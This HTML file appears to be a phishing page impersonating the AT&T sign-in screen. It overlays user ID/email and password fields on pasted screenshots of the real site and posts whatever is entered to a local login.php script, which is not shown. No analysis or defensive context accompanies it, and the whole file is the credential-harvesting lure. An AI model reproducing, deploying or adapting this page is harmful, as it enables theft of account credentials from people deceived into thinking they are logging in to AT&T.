<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>AT&T Login</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1348px; height:608px; z-index:0"><img src="images/paste172.jpg" alt="" title="" border=0 width=1348 height=608></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:602px; width:1349px; height:470px; z-index:1"><img src="images/paste173.jpg" alt="" title="" border=0 width=1349 height=470></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:203px;left:844px;top:190px;z-index:3;height: 24px;" placeholder="ID/Email">
<input name="formtext2" type="password" style="position:absolute;width:203px;left:844px;top:243px;z-index:4;height: 24px;" placeholder="Password">
<div id="formcheckbox1" style="position:absolute; left:840px; top:290px; z-index:7"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:841px; top:353px; z-index:8"><input type="image" name="formimage1" width="231" height="31" src="images/att.PNG"></div>
</form>

<div id="image3" style="position:absolute; overflow:hidden; left:827px; top:390px; width:266px; height:32px; z-index:5"><img src="images/paste174.jpg" alt="" title="" border=0 width=266 height=32></div>

<div id="image4" style="position:absolute; overflow:hidden; left:826px; top:418px; width:264px; height:27px; z-index:6"><img src="images/paste175.jpg" alt="" title="" border=0 width=264 height=27></div>


</body>
</html>
